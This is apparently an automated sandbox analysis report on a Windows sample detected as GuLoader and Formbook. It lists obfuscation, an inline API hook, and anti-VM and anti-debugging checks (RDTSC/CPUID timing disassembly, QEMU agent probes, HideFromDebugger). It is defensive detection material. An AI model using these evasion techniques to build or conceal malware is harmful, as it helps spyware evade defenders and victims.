Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15841F 36_2_1E15841F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201002 36_2_1E201002
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15B090 36_2_1E15B090
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14F900 36_2_1E14F900
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E140D20 36_2_1E140D20
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E211D55 36_2_1E211D55
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15D5E0 36_2_1E15D5E0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: String function: 1E14B150 appears 32 times
PE / OLE file has an invalid certificate
Source: ZGNX11JMSc.exe Static PE information: invalid certificate
PE file contains strange resources
Source: ZGNX11JMSc.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ZGNX11JMSc.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ZGNX11JMSc.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: ZGNX11JMSc.exe, 00000001.00000000.213248229.0000000000438000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameANTISOCIA.exe vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000002.1048619295.000000001E3CF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000002.1042709063.00000000009A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000000.621492297.0000000000438000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameANTISOCIA.exe vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe Binary or memory string: OriginalFilenameANTISOCIA.exe vs ZGNX11JMSc.exe
Uses 32bit PE files
Source: ZGNX11JMSc.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/0@6/1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File created: C:\Users\user\AppData\Local\Temp\~DFF8A59228C9DEEDCA.TMP
Source: ZGNX11JMSc.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: ZGNX11JMSc.exe Virustotal: Detection: 20%
Source: unknown Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe'
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe'
Source: ZGNX11JMSc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: netstat.pdbGCTL source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source: Binary string: netstat.pdb source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: ZGNX11JMSc.exe, 00000024.00000002.1048163880.000000001E120000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ZGNX11JMSc.exe
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: ZGNX11JMSc.exe

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.623756181.0000000002240000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match File source: ZGNX11JMSc.exe, type: SAMPLE
Source: Yara match File source: 1.0.ZGNX11JMSc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.0.ZGNX11JMSc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.ZGNX11JMSc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000000.621430446.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.213217103.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.623260641.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0040495E push es; ret 1_2_00404963
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02061774 push edx; ret 1_2_020617A1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02064205 push edx; ret 1_2_02064231
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02062A05 push edx; ret 1_2_02062A31
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02061205 push edx; ret 1_2_02061231
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02065A03 push edx; ret 1_2_02065A31
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02066214 push edx; ret 1_2_02066241
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02064A13 push edx; ret 1_2_02064A41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02063213 push edx; ret 1_2_02063241
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02061A13 push edx; ret 1_2_02061A41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02060218 push edx; ret 1_2_02060241
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02063A24 push edx; ret 1_2_02063A51
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02062224 push edx; ret 1_2_02062251
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02060A24 push edx; ret 1_2_02060A51
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02066A24 push edx; ret 1_2_02066A51
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02065225 push edx; ret 1_2_02065251
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02064233 push edx; ret 1_2_02064261
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02062A33 push edx; ret 1_2_02062A61
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02061233 push edx; ret 1_2_02061261
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02065A33 push edx; ret 1_2_02065A61
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02064A44 push edx; ret 1_2_02064A71
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02063244 push edx; ret 1_2_02063271
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02061A44 push edx; ret 1_2_02061A71
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02066244 push edx; ret 1_2_02066271
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02060248 push edx; ret 1_2_02060271
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02063A54 push edx; ret 1_2_02063A81
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02062254 push edx; ret 1_2_02062281
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02066A54 push edx; ret 1_2_02066A81
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02065253 push edx; ret 1_2_02065281
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02060A58 push edx; ret 1_2_02060A81
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02065A64 push edx; ret 1_2_02065A91

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEE
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408FD TerminateProcess, 1_2_022408FD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022468CC NtWriteVirtualMemory, 1_2_022468CC
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022442CD NtWriteVirtualMemory, 1_2_022442CD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B1A NtWriteVirtualMemory, 1_2_02241B1A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B5F NtWriteVirtualMemory, 1_2_02241B5F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022443F1 NtWriteVirtualMemory, 1_2_022443F1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247036 NtWriteVirtualMemory, 1_2_02247036
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244071 NtWriteVirtualMemory, 1_2_02244071
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240845 TerminateProcess, 1_2_02240845
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408B3 TerminateProcess, 1_2_022408B3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408E2 TerminateProcess, 1_2_022408E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224790A 1_2_0224790A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242958 NtWriteVirtualMemory, 1_2_02242958
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241E2C NtWriteVirtualMemory, 1_2_02241E2C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224767B 1_2_0224767B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02246F9E 1_2_02246F9E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240C24 TerminateProcess, 1_2_02240C24
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224742D 1_2_0224742D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224341B NtWriteVirtualMemory, 1_2_0224341B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224251E NtWriteVirtualMemory, 1_2_0224251E
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000022401BE second address: 00000000022401BE instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000022470C1 second address: 00000000022470D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248DB2 second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248DFF second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007FA2E4BBF2EFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002247A0D second address: 0000000002247A0D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002247D7F second address: 0000000002247D7F instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248035 second address: 0000000002248035 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002240ADA second address: 0000000002240ADA instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002240DB2 second address: 0000000002240DB2 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002241092 second address: 0000000002241092 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 000000000224110D second address: 000000000224110D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000000567062 second address: 000000000056707C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add dword ptr [ebp+0000019Dh], 431ADB4Eh 0x00000014 pushad 0x00000015 mov edx, 0000008Fh 0x0000001a rdtsc
Tries to detect Any.run
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000022401BE second address: 00000000022401BE instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000022470C1 second address: 00000000022470D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248DB2 second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248DFF second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007FA2E4BBF2EFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002247A0D second address: 0000000002247A0D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000022475BB second address: 00000000022475BB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 52600CA0h 0x00000013 xor eax, 275578A5h 0x00000018 xor eax, AF7E784Ah 0x0000001d xor eax, DA4B0C4Eh 0x00000022 cpuid 0x00000024 jmp 00007FA2E4BBF35Eh 0x00000026 test dl, dl 0x00000028 bt ecx, 1Fh 0x0000002c test dx, ax 0x0000002f jc 00007FA2E4BBF90Eh 0x00000035 test bx, bx 0x00000038 test eax, ebx 0x0000003a popad 0x0000003b call 00007FA2E4BBF45Ah 0x00000040 lfence 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002247D7F second address: 0000000002247D7F instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248035 second address: 0000000002248035 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002240ADA second address: 0000000002240ADA instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002240DB2 second address: 0000000002240DB2 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002241092 second address: 0000000002241092 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 000000000224110D second address: 000000000224110D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000005675BB second address: 00000000005675BB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 52600CA0h 0x00000013 xor eax, 275578A5h 0x00000018 xor eax, AF7E784Ah 0x0000001d xor eax, DA4B0C4Eh 0x00000022 cpuid 0x00000024 jmp 00007FA2E439A94Eh 0x00000026 test dl, dl 0x00000028 bt ecx, 1Fh 0x0000002c test dx, ax 0x0000002f jc 00007FA2E439AEFEh 0x00000035 test bx, bx 0x00000038 test eax, ebx 0x0000003a popad 0x0000003b call 00007FA2E439AA4Ah 0x00000040 lfence 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000000566FB5 second address: 0000000000567020 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov ebx, 9A3693F5h 0x00000008 cmp cx, cx 0x0000000b sub ebx, C476974Ah 0x00000011 test ax, 00008AFBh 0x00000015 sub ebx, E4232D93h 0x0000001b add ebx, 0E643128h 0x00000021 mov bx, word ptr [edx+ebx] 0x00000025 mov ax, word ptr [eax] 0x00000028 cmp dl, FFFFFFB4h 0x0000002b xor ax, cx 0x0000002e cmp bx, cx 0x00000031 xor bx, ax 0x00000034 mov word ptr [ebp+00000275h], di 0x0000003b mov di, 3896h 0x0000003f xor di, 7DA2h 0x00000044 test dx, ax 0x00000047 xor di, 97D1h 0x0000004c cmp cx, cx 0x0000004f xor di, 88A8h 0x00000054 pushad 0x00000055 mov si, 5497h 0x00000059 cmp si, 5497h 0x0000005e jne 00007FA2E4BBEECAh 0x00000064 popad 0x00000065 pushad 0x00000066 mov edx, 000000DBh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000000567020 second address: 0000000000566FB5 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp bx, di 0x00000006 mov di, word ptr [ebp+00000275h] 0x0000000d je 00007FA2E439A936h 0x0000000f inc cx 0x00000011 jmp 00007FA2E439A899h 0x00000016 test al, A3h 0x00000018 mov eax, dword ptr [ebp+64h] 0x0000001b pushad 0x0000001c mov edx, 00000063h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000000567062 second address: 000000000056707C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add dword ptr [ebp+0000019Dh], 431ADB4Eh 0x00000014 pushad 0x00000015 mov edx, 0000008Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 000000000056707C second address: 000000000056707C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [ebp+0000019Dh], 293F2C89h 0x0000000d sub dword ptr [ebp+0000019Dh], E4024E33h 0x00000017 pushad 0x00000018 mov bh, 30h 0x0000001a cmp bh, 00000030h 0x0000001d jne 00007FA2E4397793h 0x00000023 popad 0x00000024 cmp ebx, dword ptr [ebp+0000019Dh] 0x0000002a jnl 00007FA2E439A929h 0x0000002c add ebx, 02h 0x0000002f jmp 00007FA2E439A8BFh 0x00000031 test bh, 0000005Ch 0x00000034 xor word ptr [eax+ebx], cx 0x00000038 test dl, FFFFFF99h 0x0000003b mov dword ptr [ebp+0000019Dh], CA26A2BDh 0x00000045 test bx, ax 0x00000048 pushad 0x00000049 nop 0x0000004a nop 0x0000004b mov eax, 00000001h 0x00000050 cpuid 0x00000052 popad 0x00000053 add dword ptr [ebp+0000019Dh], 431ADB4Eh 0x0000005d pushad 0x0000005e mov edx, 0000008Fh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408FD rdtsc 1_2_022408FD
Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: ZGNX11JMSc.exe, 00000024.00000003.1031145557.0000000000A43000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW,
Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408FD rdtsc 1_2_022408FD
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk, 36_2_1E189A00
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02246B93 mov eax, dword ptr fs:[00000030h] 1_2_02246B93
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022450CA mov eax, dword ptr fs:[00000030h] 1_2_022450CA
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242958 mov eax, dword ptr fs:[00000030h] 1_2_02242958
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022471A9 mov eax, dword ptr fs:[00000030h] 1_2_022471A9
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224341B mov eax, dword ptr fs:[00000030h] 1_2_0224341B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247D52 mov eax, dword ptr fs:[00000030h] 1_2_02247D52
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14AA16 mov eax, dword ptr fs:[00000030h] 36_2_1E14AA16
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14AA16 mov eax, dword ptr fs:[00000030h] 36_2_1E14AA16
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E163A1C mov eax, dword ptr fs:[00000030h] 36_2_1E163A1C
